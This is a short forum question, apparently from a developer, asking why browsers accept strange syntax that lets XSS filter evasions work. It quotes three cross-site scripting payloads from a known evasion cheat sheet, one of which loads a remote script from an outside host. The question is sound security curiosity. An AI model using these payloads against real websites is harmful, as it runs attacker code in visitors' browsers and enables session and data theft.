why browser allow strange javascript: combination

Reading the XSS Filter Evasion Cheat Sheet I have realized as many of the XSS filter evasions are due to particular and strange behaviors that are hidden to common developers.

In particular the following XSS filter evasion techniques have struck me:

  • <SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
  • <BODY onload!#$%&()*~+-_.,:;?@[/|]^=alert("XSS")>
  • <a href="jav&#x09;ascript:alert('XSS');">Click Me</a>

The point is: why do modern web browsers allow such things? For example, why allowing to have strange characters in the middle on the javascript: directive and not just sticking to it? I’ve never seen a developer writing jav&#x09;ascript: instead of javascript:.